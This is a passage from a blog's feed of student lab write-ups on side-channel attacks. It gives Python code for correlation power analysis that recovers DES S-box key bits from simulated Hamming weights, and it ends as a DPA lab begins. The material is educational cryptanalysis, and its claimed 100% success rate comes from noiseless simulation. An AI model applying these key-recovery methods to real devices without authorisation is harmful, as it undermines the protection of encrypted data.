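vertical axes, waveform, spikes, etc.)</li><li>Print all of the recovered correct key bytes, bestguess</li></ul></li><li><p>Analyze how the power traces affect key recovery: for 10, 50, 100, 150, 200 and 240 traces, how many key bytes are recovered correctly and at which positions, and analyze why.</p></li></ol><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>Procedure</h2><h3 id="pts、pcts、pns分别是什么数据、类型、维数"><a href="#pts、pcts、pns分别是什么数据、类型、维数" class="headerlink" title="pts、pcts、pns分别是什么数据、类型、维数"></a>Data, type and dimensions of pts, pcts and pns</h3><h4 id="pts"><a href="#pts" class="headerlink" title="pts"></a>pts</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/f1eca09c5a395e01988218b70064c095.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> Figure 6.1     Part of the pts data </small> </b></center>Data: plaintext<p>Type: array</p><p>Dimensions: 2-D (250, 16)</p><h4 id="pcts"><a href="#pcts" class="headerlink" title="pcts"></a>pcts</h4><p><img src="https://img-blog.csdnimg.cn/89f9a33db14c43a3a3ff210f60e1ea22.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> Figure 6.2     Part of the pcts data </small> </b></center>Data: plaintext, ciphertext<p>Type: array</p><p>Dimensions: 3-D (250, 2, 16)</p><h3 id="pns"><a 
href="#pns" class="headerlink" title="pns"></a>pns</h3><p><img src="https://img-blog.csdnimg.cn/1f34161969944775956c2e2bc4338788.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> Figure 6.3     Part of the pns data </small> </b></center>Data: vertical-axis values of the power traces<p>Type: array</p><p>Dimensions: 2-D (250, 10000)</p><h3 id="完善相关系数的计算代码"><a href="#完善相关系数的计算代码" class="headerlink" title="完善相关系数的计算代码"></a>Completing the correlation coefficient code</h3><p>The code before the statement <code>hwlist = np.zeros(numtraces)</code> comes with the program. The outermost for loop iterates over the key byte positions, and the second for loop iterates over all possible key values. This lab XORs the plaintext of each power trace with the key guess and then runs the subsequent code, so one more loop is needed so that the plaintexts of the configured number of traces can be combined with the key guess to obtain the Hamming weights. The code is as follows.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hwlist = np.zeros(numtraces) <span class="comment"># initialize the array</span></span><br><span class="line"><span class="keyword">for</span> tnum <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, numtraces):</span><br><span class="line"> hwlist[tnum] = HW[intermediate(pt[tnum][bnum], kguess)]</span><br></pre></td></tr></table></figure><p>Note how the 2-D array pt is indexed (elsewhere the program assigns the plaintext array to pt): in the pts plaintext array, 250 is the number of plaintexts and 16 is the size of each plaintext, so each plaintext array has length 16.</p><p>Because this uses the Hamming weight model, following the approach of the earlier labs, the next step is to apply the correlation coefficient formula<br>$$<br>{r_{i,j} } = \frac{ {\sum\nolimits_{d = 1}^D {\left[ {\left( { {h_{d,i} } - \overline { {h_i} } } \right)\left( { {t_{d,j} } - \overline { {t_j} } } \right)} \right]} } }{ {\sqrt {\sum\nolimits_{d = 1}^D { </p>]]></content>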
<summary type="html"><p>I referred to an expert's <a href="https://github.com/newaetech/wiki.newae.com/blob/master/Tutorial_B6_Breaking_AES_%28Manual_CPA_Attack%29.mw">article</a> and learned a great deal from it.<br></summary>
<category term="SCA" scheme="http://example.com/categories/SCA/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>S-box CPA Side-Channel Attack</title>
<link href="http://example.com/2021/12/24/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%B8%89%20S%E7%9B%92CPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/"/>
<id>http://example.com/2021/12/24/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%B8%89%20S%E7%9B%92CPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/</id>
<published>2021-12-23T16:11:30.000Z</published>
<updated>2022-03-18T06:03:46.019Z</updated>
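<content type="html"><![CDATA[<p>—————————————Update 202/12/24—————————————</p><p>If any image cannot be viewed, copy the image link and open it in a browser.<br>—————————————Update 202/12/23—————————————<br>This lab has a lot in common with my other post <a href="https://blog.csdn.net/Reaper_MXBG/article/details/122019954">Side-Channel Lab 2: S-box DPA Side-Channel Attack</a>; at least the stage of completing the Sboxcpa攻击-student.py program is the same. Because they are so similar, I have not repeated some of the details; for more detail, see my other post.<br>——————————————-Original content——————————————-</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Objectives</h2><ol><li>Understand the basic principle of side-channel attacks on an S-box;</li><li>Understand the basic principle and method of the CPA attack.</li></ol><h2 id="实验人数"><a href="#实验人数" class="headerlink" title="实验人数"></a>Group size</h2><p>1 person per group</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>System environment</h2><p>Windows</p><h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>Principle</h2><ol><li><p>Measurement phase: a random number of plaintexts are XORed with the preset correct key, and the 6-bit result is used as the S-box input. The number of 1 bits in the binary form of each S-box output is counted as its Hamming weight, and all the outputs together give an array of Hamming weights.</p></li><li><p>Attack phase: iterate over every possible key, repeating the measurement phase for each one, to obtain a Hamming weight array for every key guess. Each of these is then used together with the Hamming weight array obtained with the correct key to compute the correlation coefficient, using the formula<br>$$<br>corr=\frac{\sum_n^{}{\left(x_i-\overline{x} \right)}\cdot \left( y_i-\overline{y} \right)}{\sqrt{\sum_n^{}{\left( x_i-\overline{x} \right) ^2}}\cdot \sqrt{\sum_n^{}{\left( y_i-\overline{y} \right) ^2}}}<br>$$<br>where $\overline{x}=\frac{1}{n}\sum_n^{}{x_i}$ and $\overline{y}=\frac{1}{n}\sum_n^{}{y_i}$ are the means.</p></li></ol><h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>Tasks</h2><ol><li><p>Fill in the missing parts of the Sboxdpa仿真-student.py program</p><ul><li><p>Fill in n, plaintext and keyTrue</p></li><li><p>Fill in the HWfun function, which returns the Hamming weight of its input</p></li><li><p>Fill in the main function to obtain the Hamming weight vector of the outputs</p></li></ul></li><li><p>Fill in the missing parts of the Sboxcpa攻击-student.py program:</p><ul><li><p>Fill in plaintext and power_std</p></li><li><p>Fill in the correlation function Corrfun, which returns the correlation coefficient of two vectors</p></li><li><p>Fill in the main function: try every possible key, compute the correlation coefficient for each key, and find the key guess with the largest correlation coefficient</p></li></ul></li><li><p>Test with 2 data sets</p></li></ol><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>Procedure</h2><h3 id="完善Sboxdpa仿真-student-py程序"><a href="#完善Sboxdpa仿真-student-py程序" class="headerlink" title="完善Sboxdpa仿真-student.py程序"></a>Completing the Sboxdpa仿真-student.py program</h3><h4 id="补充变量"><a href="#补充变量" 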
class="headerlink" title="补充变量"></a>Filling in the variables</h4><p>Fill in the three variables n, plaintext and keyTrue</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">n = <span class="number">9</span> <span class="comment"># length of the first plaintext array</span></span><br><span class="line"><span class="comment">#n = 64 # length of the second plaintext array</span></span><br><span class="line">plainlist = [<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>] <span class="comment"># first plaintext array</span></span><br><span class="line"><span class="comment">#plainlist = [3, 10, 3, 1, 9, 48, 2, 59, 50, 32, 7, 27, 27, 54, 32, 52, 39, 2, 11, 41, 42, 9, 7, 62, 63, 62, 56, 40, 19, 55, 57, 40, 7, 7, 37, 34, 15, 26, 18, 58, 32, 9, 56, 1, 42, 35, 60, 7, 43, 56, 26, 28, 16, 25, 2, 57, 47, 44, 62, 27, 9, 31, 6, 5] # second plaintext array</span></span><br><span class="line">keyTrue = <span class="number">49</span> <span class="comment"># key used for encryption</span></span><br></pre></td></tr></table></figure><h4 id="完善HWfun函数"><a href="#完善HWfun函数" class="headerlink" title="完善HWfun函数"></a>Completing the HWfun function</h4><p>In essence this function counts the 1 bits in the binary representation of an integer, which can be done with a fast bit-counting method.</p><p>The added code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">HWfun</span>(<span 
class="params">num</span>):</span><br><span class="line"> <span class="comment"># Count and return the Hamming weight of the input num</span></span><br><span class="line"> ans = <span class="number">0</span></span><br><span class="line"> <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> num > <span class="number">0</span>:</span><br><span class="line"> num &= (num - <span class="number">1</span>)</span><br><span class="line"> ans += <span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> ans</span><br></pre></td></tr></table></figure><h4 id="完善主函数"><a href="#完善主函数" class="headerlink" title="完善主函数"></a>Completing the main function</h4><p>A table-formatting library is used to tidy up the output.</p><p>The added code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="comment"># Added: list of Hamming weights of the S-box outputs</span></span><br><span class="line"> table = pt.PrettyTable()</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, keyTrue)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[i]))</span><br><span class="line"> table.add_column(<span class="string">'序号'</span>,[i <span class="keyword">for</span> i <span 
class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,n+<span class="number">1</span>)])</span><br><span class="line"> table.add_column(<span class="string">'明文-十进制'</span>,[index <span class="keyword">for</span> index <span class="keyword">in</span> plainlist])</span><br><span class="line"> table.add_column(<span class="string">'S盒输出-十进制'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> HWout])</span><br><span class="line"> table.add_column(<span class="string">'S盒输出-汉明重量'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> hw_std])</span><br><span class="line"> <span class="built_in">print</span>(table)</span><br></pre></td></tr></table></figure><h4 id="程序运行结果"><a href="#程序运行结果" class="headerlink" title="程序运行结果"></a>Program output</h4><p><img src="https://img-blog.csdnimg.cn/img_convert/6a932427825b14d460c6bf6f10c76497.png#pic_center" alt="3-1.1"></p><center> <b> <small> Figure 6.1     Table output for the plaintext array of length 9 </small> </b></center><p><img src="https://img-blog.csdnimg.cn/img_convert/f2c4c925bc3612620762618e8f0a6bcf.png#pic_center" alt="3-1.2"></p><center> <b> <small> Figure 6.2     Table output for the plaintext array of length 64 </small> </b></center><h3>Completing the Sboxcpa攻击-student.py program</h3><h4 id="补充变量-1"><a href="#补充变量-1" class="headerlink" title="补充变量"></a>Filling in the variables</h4><p>Using the results obtained from the Sboxdpa仿真-student.py program:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">plainlist = [<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>] <span class="comment"># first plaintext array</span></span><br><span class="line"><span class="comment">#plainlist = [3, 10, 3, 1, 
9, 48, 2, 59, 50, 32, 7, 27, 27, 54, 32, 52, 39, 2, 11, 41, 42, 9, 7, 62, 63, 62, 56, 40, 19, 55, 57, 40, 7, 7, 37, 34, 15, 26, 18, 58, 32, 9, 56, 1, 42, 35, 60, 7, 43, 56, 26, 28, 16, 25, 2, 57, 47, 44, 62, 27, 9, 31, 6, 5] # second plaintext array</span></span><br><span class="line">power_std = [<span class="number">2</span>, <span class="number">2</span>, <span class="number">1</span>, <span class="number">2</span>, <span class="number">2</span>, <span class="number">2</span>, <span class="number">1</span>, <span class="number">1</span>, <span class="number">2</span>] <span class="comment"># Hamming weight array for the first plaintext array</span></span><br><span class="line"><span class="comment">#power_std = [2, 0, 2, 4, 2, 0, 3, 4, 4, 2, 3, 2, 2, 1, 2, 3, 2, 3, 2, 2, 2, 2, 3, 1, 1, 1, 3, 2, 1, 1, 1, 2, 3, 3, 2, 2, 0, 2, 2, 1, 2, 2, 3, 4, 2, 2, 3, 3, 2, 3, 2, 1, 4, 3, 3, 1, 3, 2, 1, 2, 2, 3, 3, 2] # Hamming weight array for the second plaintext array</span></span><br></pre></td></tr></table></figure><h4 id="完善Corrfun函数"><a href="#完善Corrfun函数" class="headerlink" title="完善Corrfun函数"></a>Completing the Corrfun function</h4><p>The code is derived entirely from the formula:<br>$$<br>corr=\frac{\sum_n^{}{\left(x_i-\overline{x} \right)}\cdot \left( y_i-\overline{y} \right)}{\sqrt{\sum_n^{}{\left( x_i-\overline{x} \right) ^2}}\cdot \sqrt{\sum_n^{}{\left( y_i-\overline{y} \right) ^2}}}<br>$$</p><p>The added code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">Corrfun</span>(<span class="params">n, pstd, ptest</span>): <span class="comment"># 
compute the correlation coefficient</span></span><br><span class="line"> <span class="comment"># Added correlation function; returns the correlation coefficient of the two vectors</span></span><br><span class="line"> pstd_mean = mean(pstd)</span><br><span class="line"> ptest_mean = mean(ptest)</span><br><span class="line"> mole = <span class="number">0</span></span><br><span class="line"> denx = <span class="number">0</span></span><br><span class="line"> deny = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> mole += (ptest[i] - ptest_mean) * (pstd[i] - pstd_mean)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> denx += (ptest[i] - ptest_mean)**<span class="number">2</span></span><br><span class="line"> deny += (pstd[i] - pstd_mean)**<span class="number">2</span></span><br><span class="line"> den2 = math.sqrt(denx) * math.sqrt(deny)</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">abs</span>(mole/den2)</span><br></pre></td></tr></table></figure><h4 id="完善主函数-1"><a href="#完善主函数-1" class="headerlink" title="完善主函数"></a>Completing the main function</h4><p>Iterate over all 64 keys from 0 to 63 (every possible key). For each key guess, pass the resulting Hamming weight array together with the Hamming weight array obtained with the correct key to the Corrfun function to compute the correlation coefficient. The key whose correlation coefficient is the maximum over all guesses, which equals 1, is the correct key.</p><p>The added code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span 
class="string">"__main__"</span>:</span><br><span class="line"> <span class="comment"># Iterate over all possible keys, compute the correlation coefficient for each key guess, and find the guess with the largest coefficient</span></span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><h4 id="程序运行结果-1"><a href="#程序运行结果-1" class="headerlink" title="程序运行结果"></a>Program output</h4><p>The result is the same for the arrays of both lengths:<br><img src="https://img-blog.csdnimg.cn/img_convert/3e5fb7bae94b76226c8a31b598b724d0.png#pic_center" alt="3-1.2"></p><center> <b> <small> Figure 6.3     Key guess for the plaintext arrays of length 9 and 64 </small> </b></center><h2 id="思考问题"><a href="#思考问题" class="headerlink" title="思考问题"></a>Questions for thought</h2><h3 id="除了利用汉明重量模型,还可以用什么模型进行攻击?"><a href="#除了利用汉明重量模型,还可以用什么模型进行攻击?" 
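class="headerlink" title="除了利用汉明重量模型,还可以用什么模型进行攻击?"></a>Besides the Hamming weight model, which other models can be used for the attack?</h3><p>Multi-valued models: Hamming weight model, Hamming distance model</p><p>Binary models: bit model, zero-value model</p><p>Besides the Hamming weight model, at least three other models can be used.</p><p>Which simulation model to use in a real attack has to be chosen flexibly according to how the targeted data changes, how the cryptographic chip implements the algorithm (software or hardware implementation), the attack method in use, and so on.</p><p>The most familiar of these is the Hamming distance model, which is usually used to compare two binary strings of the same length. It can also be applied to character strings, comparing how similar they are by counting the number of differing characters. CPA attacks on hardware generally use the Hamming distance model; one reason is that when the set of power traces is large, the Hamming distance model has an advantage over the Hamming weight model.</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>While implementing the CPA simulation lab, I tested how different plaintext lengths affect the key guess. As shown above, my first test with a plaintext array of length 9 gave the correct result. That alone does not establish that the success rate is 100%, so I carried out further tests step by step:</p><h3 id="阶段实验"><a href="#阶段实验" class="headerlink" title="阶段实验"></a>Staged experiments</h3><p><strong>Stage 1:</strong></p><p>Use the original plaintext array <code>plainlist = [41, 35, 62, 4, 33, 44, 22, 46, 18]</code>, iterate over the 64 keys, and check the results.</p><p>The main function is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = 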
sboxout(n, plainlist, i) <span class="comment"># S-box output</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j])) <span class="comment"># Hamming weight</span></span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><p>Part of the output is shown below:</p><p><img src="https://img-blog.csdnimg.cn/3f5f1eada9f04fdfb69da8b3d717d88f.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> Figure 8.1     Partial output of the Stage 1 program </small> </b></center><p>The remaining results are the same, which shows that changing the key does not affect the success rate.</p><p><strong>Stage 2:</strong></p><p>Test with 100 arrays of the same length (set to 19) but different plaintext contents, with the correct key set to 63.</p><p>The main function is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line"> plainlist = <span class="built_in">list</span>(np.random.randint(<span class="number">64</span>, size=<span class="number">19</span>))</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = sboxout(n, plainlist, <span class="number">63</span>)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j]))</span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span 
class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><p>Part of the output is shown below:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/257c17aae79fae9465778e6bd0186bef.png#pic_center" alt="3-1.4"></p><center> <b> <small> Figure 8.2     Partial output of the Stage 2 program </small> </b></center>The remaining results are the same, which shows that changing the plaintext contents does not affect the success rate.<p><strong>Stage 3:</strong></p><p>Vary the plaintext length from 9 to 64. The upper limit of a DES plaintext block is 64; the reason for starting at 9 is that when the length is too small, a division by zero can occur inside the Corrfun function. The correct key is set to 45.</p><p>The main function is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>,<span class="number">65</span>):</span><br><span class="line"> plainlist = <span class="built_in">list</span>(np.random.randint(<span class="number">64</span>, size = i))</span><br><span class="line"> keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line"> n = <span class="built_in">len</span>(plainlist)</span><br><span class="line"> power_std = []</span><br><span class="line"> HWout_true = 
sboxout(n, plainlist, <span class="number">45</span>)</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> power_std.append(HWfun(HWout_true[j]))</span><br><span class="line"> Corrlist = []</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line"> hw_std = []</span><br><span class="line"> HWout = sboxout(n, plainlist, k)</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line"> hw_std.append(HWfun(HWout[m]))</span><br><span class="line"> Corrlist.append(Corrfun(n, power_std, hw_std))</span><br><span class="line"> final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, Corrlist))</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"正确密钥:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br></pre></td></tr></table></figure><p>Part of the output is shown below:</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e5b4924bd69342de77ba05c5e16eb6b1.png#pic_center" alt="3-1.5"></p><center> <b> <small> Figure 8.3     Partial output of the Stage 3 program </small> </b></center>The remaining results are the same, which shows that changing the length of the plaintext array does not affect the success rate.<h3 id="综合分析"><a href="#综合分析" class="headerlink" title="综合分析"></a>Overall analysis</h3><p>The staged experiments show that the success rate of the simulated CPA attack is 100% in all cases, much better than DPA. The reason is that CPA takes variance into account, which markedly improves its guessing accuracy.</p>]]></content>
<summary type="html"><p>—————————————Update 202&#x2F;12&#x2F;24—————————————</p>
<p>If any image cannot be viewed, copy the image link and open it in a browser.<br>—————————————Update 202&#x2F;12&#x2F;23—————————————<br>This lab</summary>
<category term="SCA" scheme="http://example.com/categories/SCA/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>S-box DPA Side-Channel Attack</title>
<link href="http://example.com/2021/12/19/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%BA%8C%20S%E7%9B%92DPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/"/>
<id>http://example.com/2021/12/19/%E4%BE%A7%E4%BF%A1%E9%81%93%E5%AE%9E%E9%AA%8C%E5%AE%9E%E9%AA%8C%E4%BA%8C%20S%E7%9B%92DPA%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB/</id>
<published>2021-12-18T18:55:27.000Z</published>
<updated>2022-03-18T06:03:46.020Z</updated>
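<content type="html"><![CDATA[<p>—————————————202/12/19 update—————————————<br>In addition to the key search range being limited to 0-63 by the DES S-box's "6-in, 4-out" mechanism, the plaintext used as S-box input is also limited to a length of 64 per group. After I changed the plaintext array length from 1000 to 64, the guessing accuracy was also 100%.<br>——————————————-Original content——————————————-</p><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Objectives</h2><ol><li>Understand the basic principle of side-channel attacks on the S-box;</li><li>Understand the Hamming-weight attack model;</li><li>Understand the basic principle and method of the DPA attack.</li></ol><h2 id="实验人数"><a href="#实验人数" class="headerlink" title="实验人数"></a>Group size</h2><p>1 person per group</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>System environment</h2><p>Windows</p><h2 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>Principle</h2><ol><li>Measurement phase: XOR a random number of plaintexts with the preset correct key and feed the resulting 6-bit value into the S-box. Count the 1 bits in the binary form of each S-box output as its Hamming weight; all outputs together give a Hamming-weight array.</li><li>Attack phase: iterate over every possible key, repeating the measurement phase for each guess, to obtain a Hamming-weight array for every guessed key. For each array, compute the median of its elements and use it as the criterion for partitioning the Hamming-weight array obtained with the correct key into two sets. Then compute $\overline{x_H}=\frac{1}{\lvert H \rvert}\sum_{i\in H}^{}{x_i}$ and $\overline{x_L}=\frac{1}{\lvert L \rvert}\sum_{i\in L}^{}{x_i}$, where $||$ denotes the number of elements in a set, and take the difference of means $DpaValue=\overline{x_H}-\overline{x_L}$. Finally, the guessed key with the largest difference is chosen as the correct key.</li></ol><h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>Tasks</h2><ol><li><p>Fill in the missing parts of the Sboxdpa仿真-student.py program</p><ul><li><p>Fill in n, plaintext and keyTrue</p></li><li><p>Complete the HWfun function so that it returns the Hamming weight of its input</p></li><li><p>Complete the main function to obtain the Hamming-weight vector of the outputs</p></li></ul></li><li><p>Fill in the missing parts of the Sboxdpa-student.py file, namely</p><ul><li><p>Fill in plaintext and power_std</p></li><li><p>Complete the DPAfun function to compute the 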